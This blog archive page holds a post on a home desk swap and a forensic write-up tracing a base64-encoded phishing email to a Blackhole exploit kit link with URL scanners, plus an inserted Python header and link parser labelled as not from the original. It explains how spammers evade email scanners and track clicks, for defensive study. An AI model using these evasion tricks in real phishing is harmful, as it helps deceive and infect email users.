Last week I found a cheap trestle-style mini-desk that was perfect in color, style and size for the living room. With minimal rearrangement I was able to place it in the living room along with a nice matching traditional wooden chair with a faux-leather seat cushion. It was a great pairing. While not my favorite in terms of style, it was a perfect pairing of form and function (and price) so I struck while the iron was still hot.

That weekend saw a slew of postings which has brought me almost halfway to as many posts as I did in all of last year.

Now I have my own elegant and relaxing workspace again where I can use my laptop, but still be “present” with Lavie and Alvis after work or on the weekends.

Now the story should end there.

However, this weekend Alvis and I finally got around to swapping our desks. These are not to be confused with the new one above.

See, Alvis has been using a large French-country style desk in her room for her homework/TV/laptop/crafting needs.  It is a beautiful desk that has an attached shelving unit over it. Meanwhile my desk (the one in the library I have mentioned already) is an Ikea special with a simple solid wood frame, a side-caddy for a desktop PC and a small pullout drawer that held all those misc. USB cables and PC hardware bits that accumulate.

Alvis, in her artsy/interior-design-y mode, decided she needed to “open up” the space in her room and swap desks. This way she has more physical room (since mine is smaller) and gains a desk that is more work-bench-like for her crafting. It will also work better for her new machine-sewing hobby and crafting system.

So yesterday we set to work clearing off our desks and emptying them of their contents. Lots of cables to re-manage, lots of missed dust to remediate. And the desks were swapped.

Alvis’s (new-to-her) desk fit perfectly and holds a small LCD TV that doubles as a second monitor for her laptop. The solid wood surface is firmer for crafting and the lack of an overhead shelving system means she can now feed large lengths of fabric easily across the surface. She did add a small wire baking rack to the side of it for storing supplies. Now she has space galore reclaimed in her room.

My (new-to-me) desk is in the study. My second LCD monitor is tucked in a corner when I do decide to work back there and need a second monitor. (I decided it just didn’t fit the living room décor or small desk added there.) It has a USB keyboard/mouse combo as well on the slide-out tray just in case. The (now long-since disconnected until I eventually get around to using it as a SAN server option-1 option-2) SFF PC is tucked away in the side-caddy. The real plus has been getting all my technical books and manuals off the stacks in the library floor and nicely organized in the over-desk shelves. I’ve also got my network hardware (switches/routers) and external hard-drives nicely sitting in their “cubbies” as well. It looks downright nice.

Funny how these things work out…I finally find the perfect desk to get me out of the library, get crazy-productive again (and make both my girls and me harmoniously happy). And the very next weekend I end up creating the super organized and comfy writing-desk/computing-workbench in the man-cave library.

I guess that’s just how we roll around here.

So long-story-short, it’s neither a matter of here or there. Simply expect more blogging this year from the GSD ranch.

–Claus V.

Categories: Forensic

Interesting Malware in Email Attempt – URL Scanner Links

January 22nd, 2012

Last weekend I spent some time with extended family helping confirm for them that their on-line email account got hacked and had been used to send some malware-linking spam emails to users in their contact list.

Yesterday our family email account was on the receiving end of a message from someone who — possibly — fell victim to an email account hack, as our email address was among several others included together as recipients. I say possibly because none of us recognized the sender’s email address and it wasn’t in any of our address books. Possibly our address, along with the others’, had been harvested somehow and this was a fake spamming account. The “show-as” name was definitely non-standard and used some letters that related to those in the subject line.

It was pretty evident to me this was probably a dangerous site to go to, but being curiously-minded, I couldn’t pass up the chance to do some detective work.

The email originated from a yahoo mail account.

The Subject line was baited “ACH Transfer Canceled…” and the display name in the email address contained the letters “NACHA.”

ACH is meant to refer to the “Automated Clearing House,” which handles financial transactions in the US and is overseen by NACHA. To most Americans, I’m betting these acronyms mean very little and they would be more taken with a sudden urge to grab some NACHOS instead. Maybe Europeans would be a little more anxious about emails purporting to come from ACH and NACHA. I digress.

First thing I looked at was the message header. Lots of goodies there. We can follow the bounce between the Yahoo mail sender and our ISP’s email servers, with the times/dates of transmission.

Since this was a Yahoo mail account, it appears the header may actually contain the IP address of the location the mail account was logged into from. This is the first time I have seen this so I need to do more research. The IP associated with this particular email is located in France.

The website IP Address Locator has lots of good tools for locating IP addresses as well as a feature that allows a copy/paste/analyze of email headers.

The content of the email was very thin: a single line with all the text run together. There is URL link markup there, however it misses getting all the characters. Hmm.

Toggling between the different modes of viewing email content in Thunderbird reveals odd results. If I look at it in original HTML mode I see a single line of text with a hyperlink in the middle.

If I view it in simple HTML, most of the text is the same but a few characters are different.

If I view it in plain text, there is nothing showing.

Hovering over the hyperlink displayed shows a URL shortener link. Hmm. Set that aside for a moment.

So I go back and look at the full header view again and find this in the message body:

Content-Type: text/html; charset=ISO-8859-5
Content-Transfer-Encoding: base64

Ah! So I copy/paste the large text block that follows it into this base64 online encoder / decoder and get a binary file to download!

(More regarding content encoding methods here Content-Transfer-Encoding – MSDN, here The Content-Transfer-Encoding Header Field via freesoft.org and here Decoding Internet Attachments – A Tutorial by Michael Santovec.)

Opening that binary file in Notepad++ reveals the HTML code with the same actual URL embedded.

I’m guessing they are using base64 encoding for the content to try to get around email scanners.
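To make the header walk and the base64 decoding steps above concrete, here is an added Python example (not code from the original post) that parses a constructed message with the same layout: a Received chain and a text/html body with Content-Transfer-Encoding: base64. The sample message, its hostnames, IPs and shortener link are all made up; it reports the hops oldest-first and the hrefs recovered from the decoded body.

```python
import base64
import email
import re

# Constructed sample (not the original post's email): a text/html body sent
# base64-encoded, so a plain-text view shows nothing and the link is hidden.
HTML_BODY = ('<html><body>ACH transfer canceled, see the report at '
             '<a href="http://shortener.example/abc123">report</a></body></html>')
RAW_MESSAGE = (
    "Received: from mail.isp.example (mail.isp.example [192.0.2.1])\n"
    "\tby mx.family.example; Sat, 21 Jan 2012 10:00:00 -0600\n"
    "Received: from [198.51.100.7] by web.mail.example; Sat, 21 Jan 2012 09:59:00 -0600\n"
    "From: \"NACHA Support\" <sender@mail.example>\n"
    "To: family@family.example\n"
    "Subject: ACH Transfer Canceled\n"
    "MIME-Version: 1.0\n"
    "Content-Type: text/html; charset=ISO-8859-5\n"
    "Content-Transfer-Encoding: base64\n"
    "\n"
    + base64.encodebytes(HTML_BODY.encode("iso-8859-5")).decode("ascii")
)

HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

def received_chain(msg):
    """IPv4 literals per hop, oldest hop first (each relay prepends its
    Received header, so the header order in the message is newest first)."""
    return [IPV4_RE.findall(h) for h in reversed(msg.get_all("Received", []))]

def extract_links(msg):
    """Undo the Content-Transfer-Encoding (get_payload(decode=True) handles
    base64 and quoted-printable), decode the charset, and pull every href."""
    body = msg.get_payload(decode=True) or b""
    html = body.decode(msg.get_content_charset() or "ascii", errors="replace")
    return HREF_RE.findall(html)

def analyze(raw_message):
    """Summarize the parts of a suspicious message the post walks through."""
    msg = email.message_from_string(raw_message)
    return {
        "transfer_encoding": msg.get("Content-Transfer-Encoding", "").strip().lower(),
        "hops": received_chain(msg),
        "links": extract_links(msg),
    }

if __name__ == "__main__":
    print(analyze(RAW_MESSAGE))
```

The recovered links are what you would then feed to the URL scanners listed later in the post, without ever clicking them.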

OK, so let’s check out that URL.

Turns out it is using Google’s own URL shortening service: Google URL Shortener. More info here: Google URL shortener – Web Search Help

Turns out this is a pretty cool choice from both sides of the security fence. By appending “.info” to the end of a goo.gl shortened URL we can find out its stats: Goo.gl URL shortener (Google Groups)

This is good from an attacker’s standpoint as they can easily monitor their success rate on the nibbles at this hook and any “hits” to the actual URL. Researchers can get info as well by monitoring the same stats and how fast/long the “click-through” happens.


Neat isn’t it?

Now that I’ve got the actual long URL that this points to, we can start tossing the URL at some on-line link analysis/scanner tools.

VirusTotal shows both TrendMicro and SCUMWARE.org report the long URL as a Malware/Malicious site.

Quttera reports it as serving up a suspicious javascript content via HTML page code.

Anubis: Analyzing Unknown Binaries provided a deeper review of the URL by capturing Windows system events in a virtual sandbox system. It accesses the Windows registry, mucks with some keys, creates a cookie, reads the autoexec.bat file, modifies some files, maps DLLs to memory and appears to try to download more stuff. The report is available in HTML, XML, PDF, and TXT formats. Also, they offer a traffic.pcap file to download so you can examine the network traffic generated and perform any network forensic analysis (NFA) you want to do. This site/tool rocks from a depth-of-information standpoint.

urlQuery gives some more report feedback when it is sandboxed. Lots of JavaScript stuff. Another strong URL analysis reporting site.

Trying it a few more times while changing the browser type/Java version/Flash version gets different results, and the URL-serving code reflects all kinds of different IPs each time. So that long URL seems to be hosted at a dynamic-IP host, allowing it to bounce around (serving up HTTP redirects) and serve up the malware code, depending on platform, from all over the place, making it harder to track down the source.

urlQuery actually identified the network traffic as being detected as a Blackhole exploit kit v1.2 HTTP GET request. Another clue.

I tossed the pcap file I got from Anubis into NETRESEC NetworkMiner. Nothing very interesting but my Microsoft Security Essentials alerted when the HTML page was reassembled by NetworkMiner and quarantined the file. It identified the page code as being Exploit:JS/Blacole.AR. (MS’s way of saying “blackhole” I suppose…)

Here is a series of links regarding these kinds of email spam threats in general, as well as Blackhole info in particular as it relates to email spam campaigns, if you are curious.

I doubt this is the last our email inbox will see of these things, but the whole process has been quite fun to follow.

I’ve decided to leave out links/images of the actual email and the header-code/URL (short/long) but have passed it along to a number of security-spam websites in case it is of use.

A long time ago I had a list of URL-testing sites to feed a URL into to see if it was safe or not. Most seem to have gone away, however the following forums had a number of new ones worth bookmarking. Hat tip to “PROROOTECT” for the legwork!

Here is a combined and cleaned-up list based on the collective work there from PROROOTECT in both places, plus at least one or two I’m tossing in, minus a few from those lists that seem dead or redirected incorrectly. PROROOTECT does make a great point that the effectiveness of these varies, so a “bad” URL in one may come back as “clean” in another. So it’s best to run your URL through multiple sources.

Note, these are URL/web-page scanners. They are a bit different from the on-line file scanners/sandboxes used to analyze malware samples, though a few seem to come pretty darn close with the depth of their reports/analysis.

Not necessarily ordered by usefulness.

PROROOTECT’s suggestion to use an online URL screenshotting service to capture the displayed URL safely is some good outside-the-box thinking. Kind of a “look-before-you-leap” thing if all the above items pass OK.

Fun trip if it wasn’t so serious…

–Claus V.

Update: I meant to add this in to the original post but got sidetracked. A recent Digital Forensics Case Leads post has mention of a super-fantastic investigation/forensic report involving anonymous emails. This is must-read material, not just in terms of the investigative methodology but also the way the report was composed and presented. Very clearly done!  I’m keeping a saved copy of the report for future reference; both technically and as a report template. From the post via the link above:

University of Illinois recently released a detailed investigation report (PDF) regarding anonymous emails allegedly sent by its Chief of Staff to the University’s Senates Conference. The report is an interesting read, and also serves as a potentially useful model for those looking for report samples and templates.

Categories: Forensic, Security